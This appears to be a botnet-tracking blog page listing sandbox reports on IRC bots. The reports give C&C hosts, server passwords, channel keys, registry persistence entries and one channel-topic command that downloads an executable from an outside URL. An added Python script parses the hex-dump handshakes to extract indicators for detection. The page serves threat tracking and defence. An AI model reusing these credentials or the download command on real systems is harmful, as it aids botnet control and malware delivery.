tes.stuckin.org: type A, class IN, addr 208.53.131.135
tes.memehehz.info: type A, class IN, addr 208.53.131.135
tes.enterhere2.biz: type A, class IN, addr 208.53.131.135
Startup: explorer.exe (PID: 776 MD5: 12896823FB95BFB3DC9B46BCAEDC9923) wscntfy.exe (PID: 676 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)
udp ports: 57134,4444
File Created: C:\RECYCLER\S-1-5-21-9031247443-7444027205-238249698-8303 C:\RECYCLER\S-1-5-21-9031247443-7444027205-238249698-8303\Desktop.ini
Memory written: 3 776 C:\WINDOWS\explorer.exe 00980000 success or wait 1 8 776 C:\WINDOWS\explorer.exe 00990000 success or ...
backup.kazeu.net (big net)
Resolved : [backup.kazeu.net] To [217.219.137.162]
Resolved : [backup.kazeu.net] To [218.206.248.154]
Resolved : [backup.kazeu.net] To [178.32.95.119]
178.32.95.119:23232
Nickname: n[USA|XPP|x32|HANS]qebjljr
User: 6625 ""
Joins channel: :#security-check#
Joins channel: #!icee PW: ERROR
Joins channel: :#!icee ...
irc.NaDe.gov
Remote Host Port Number
217.23.13.240 6374
NICK n{USA|XP}392156
USER 3921 "" "TsGh" :3921
JOIN #nade2#
PONG :irc.NaDe.gov
* The following port was open in the system:
Port Protocol Process
1053 TCP hidserv.exe (%AppData%\hidserv.exe)
Registry Modifications
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Windows Update System = "%AppData%\hidserv.exe"
so that hidserv.exe runs every ...
omgredrum.no-ip.biz
Remote Host Port Number
omgredrum.no-ip.biz 51987
Resolved : [omgredrum.no-ip.biz] To [69.65.19.117]
Resolved : [omgredrum.no-ip.biz] To [69.65.19.116]
PASS Virus
NICK VirUs-aruhtp
USER sntmwl "" "pup" :sntmwl
Registry Modifications
* The following Registry Key was created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}
* The newly created Registry Value is:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{28ABC5C0-4FCB-33CF-AAX5-35GX1C642122}]
+ StubPath = "c:\RESTORE\S-1-5-21-1482476501-1644491937-682003330-1013\RedruMx.exe"
so that ...
205.234.236.32 (Parabola botnet)
Remote Host Port Number
184.73.209.168 80
204.0.5.41 80
204.0.5.58 80
204.0.5.59 80
207.38.101.12 80
208.43.117.134 80
216.178.38.168 80
63.135.80.58 80
63.135.86.25 80
63.135.86.37 80
205.234.236.32 1234
PASS xxx
NICK NEW-[USA|00|P|39592]
USER XP-5696 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|39592] -ix
JOIN #!nn! test
PONG 22
MOTD
* The data identified by the following URLs was then requested ...
nice.niceshot.in
nice.niceshot.in 67.202.108.130
C&C Server: 67.202.108.130:6567
PASS s1m0n3t4
Server Password:
Username: XP-1204
Nickname: [SI|DEU|00|P|86096]
Channel: #sucksusb# (Password: c1rc0dus0leil)
Channeltopic: :.desfi http://iphoneate.in/salario/yem.exe c:\WINDOWS\cap.exe 1
MODE [SI|USA|00|P|97963] -ix
JOIN #update# c1rc0dus0leil
PRIVMSG #update# :[Dl]: File download: 84.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_64066.exe @ 84.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|61951]
USER XP-8990 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|61951] -ix
JOIN ...
74.208.43.209
Remote Host Port Number
74.208.43.209 5000
JOIN ##[ENG]
JOIN #msn#
PONG :4DFB1F08
NICK [V2][ENG][COMPUTERNAME]9523
PING :redc00de.no-ip.biz
00000000 | 5041 5353 200D 0A55 7365 7220 6B6B 6B20 | PASS ..User kkk
00000010 | 6B6B 6B20 6B6B 6B20 6B6B 6B20 3A6B 6B6B | kkk kkk kkk :kkk
Registry Modifications
* The newly created Registry Values are:
o ...
oki.nerashti.net (Burimi bad hecker)
Remote Host Port Number
77.68.56.80 81
addr: oki.nerashti.net ip: 77.68.56.80
addr: oki.nerashti.net ip: 88.208.209.166
The domain used by this criminal lamer is hosted in Australia, and it is strange that botnet use is allowed from domains registered at https://www.melbourneit.com.au/. Here is the contact info for the Australian hoster: Sales, Australian callers: 1300 654 677; other callers: +61 3 8624 2300. Support, Australian ...
64.202.102.11
Remote Host Port Number
184.73.209.168 80
204.0.5.42 80
204.0.5.56 80
204.0.5.58 80
208.43.117.134 80
216.178.38.103 80
216.178.38.168 80
63.135.86.25 80
63.135.86.30 80
64.208.138.218 80
64.202.102.11 1234
PASS xxx
NICK NEW-[USA|00|P|54508]
USER XP-6046 * 0 :COMPUTERNAME
MODE NEW-[USA|00|P|54508] -ix
JOIN #!nn! test
PONG 22
MOTD
* The data identified by the following URLs was then requested ...
109.196.130.50
Remote Host Port Number
109.196.130.50 57221
112.78.112.208 80
218.85.133.201 80
MODE #! -ix
MODE #Ma -ix
USER SP2-668 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0519458] @ -ix
MODE #dpi -ix
There was outbound traffic on port 57221:
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 ...
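Every entry above shows the same thing: an IRC registration handshake (PASS, NICK, USER, then a JOIN that often carries a channel key) to a C&C on a non-standard port, sometimes visible only as a sandbox hex dump. The script below is an added example, not code from this blog or from any of the sandboxes quoted. It decodes the "offset | hex | ascii" dump layout the reports use, reassembles the client stream, parses it as IRC and pulls out the indicators a tracker records: server password, nick, user, channels and channel keys, then applies a few bot heuristics. The dump it runs on is constructed for the example in the shape of the page's dumps; the nick-template regex and the list of "standard" IRC ports are my assumptions.

```python
"""Recover IRC C&C indicators from a sandbox-style hex dump (added example)."""
import re
from typing import Dict, List

# Constructed sample in the "offset | hex words | ascii" layout of the sandbox
# excerpts on this page. The session is made up for the example but mimics the
# bots' registration sequence: PASS, NICK, USER, then JOIN.
SAMPLE_HEXDUMP = """\
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 4E49 | PASS laorosr..NI
00000010 | 434B 205B 4E30 305F 5553 415F 5850 5F30 | CK [N00_USA_XP_0
00000020 | 3531 3934 3538 5D0D 0A55 5345 5220 5350 | 519458]..USER SP
00000030 | 322D 3636 3820 2A20 3020 3A43 4F4D 5055 | 2-668 * 0 :COMPU
00000040 | 5445 524E 414D 450D 0A4A 4F49 4E20 2364 | TERNAME..JOIN #d
00000050 | 7069 0D0A                               | pi..
"""

# Assumption: ports a legitimate IRC client would normally use.
STANDARD_IRC_PORTS = set(range(6660, 6670)) | {6697, 7000}

# Assumption: bot nicks on this page carry country/OS fields inside [] or {}
# separated by "|" or "_", e.g. [N00_USA_XP_0519458] or n{USA|XP}392156.
BOT_NICK_TEMPLATE = re.compile(r"[\[{][^\]}]*[|_][^\]}]*[\]}]")

# One dump line: 8-digit offset, "|", hex words, "|", ascii column.
HEXDUMP_LINE = re.compile(r"^\s*[0-9A-Fa-f]{8}\s*\|\s*([0-9A-Fa-f ]*?)\s*\|")


def hexdump_to_bytes(dump: str) -> bytes:
    """Reassemble the raw bytes from every dump line; other lines are ignored."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEXDUMP_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_irc_messages(stream: bytes) -> List[Dict[str, object]]:
    """Split a client->server stream on CRLF and parse each line as an IRC
    message: optional :prefix, command, middle params, optional :trailing."""
    messages = []
    for raw in stream.split(b"\r\n"):
        if not raw.strip():
            continue
        text = raw.decode("latin-1")  # never fail on the binary junk bots send
        prefix = None
        if text.startswith(":"):
            prefix, _, text = text[1:].partition(" ")
        head, sep, trailing = text.partition(" :")
        parts = head.split()
        if not parts:
            continue
        params = parts[1:]
        if sep:  # a trailing parameter may contain spaces (e.g. :COMPUTERNAME)
            params.append(trailing)
        messages.append({"prefix": prefix, "command": parts[0].upper(), "params": params})
    return messages


def extract_indicators(messages: List[Dict[str, object]]) -> Dict[str, object]:
    """Collect what a botnet tracker records from the handshake."""
    ind = {"password": None, "nick": None, "user": None, "realname": None,
           "channels": [], "channel_keys": {}}
    for m in messages:
        cmd, p = m["command"], m["params"]
        if cmd == "PASS":
            ind["password"] = p[0] if p else ""  # "PASS" alone = empty password
        elif cmd == "NICK" and p:
            ind["nick"] = p[0]
        elif cmd == "USER" and p:
            ind["user"] = p[0]
            ind["realname"] = p[-1] if len(p) > 1 else None
        elif cmd == "JOIN" and p:
            chans = p[0].split(",")
            keys = p[1].split(",") if len(p) > 1 else []  # JOIN #chan key
            for i, chan in enumerate(chans):
                ind["channels"].append(chan)
                if i < len(keys):
                    ind["channel_keys"][chan] = keys[i]
    return ind


def bot_reasons(ind: Dict[str, object], port: int) -> List[str]:
    """Heuristics that fired for 'this is an IRC bot'; empty list = nothing seen."""
    reasons = []
    if ind["nick"] and ind["user"]:
        reasons.append("IRC registration (NICK/USER) observed")
    if ind["password"] is not None:
        reasons.append("server password (PASS) supplied")
    if port not in STANDARD_IRC_PORTS:
        reasons.append(f"IRC on non-standard port {port}")
    if ind["nick"] and BOT_NICK_TEMPLATE.search(ind["nick"]):
        reasons.append("templated bot nick with country/OS fields")
    if ind["channel_keys"]:
        reasons.append("keyed channel join")
    return reasons


if __name__ == "__main__":
    stream = hexdump_to_bytes(SAMPLE_HEXDUMP)
    indicators = extract_indicators(parse_irc_messages(stream))
    print(indicators)
    for reason in bot_reasons(indicators, 57221):
        print("-", reason)
```

The parser works on the plain-text transcripts in the entries as well (feed them in as bytes joined with CRLF), so a line like "JOIN #!nn! test" yields the channel key "test" that the sandbox prints but does not label.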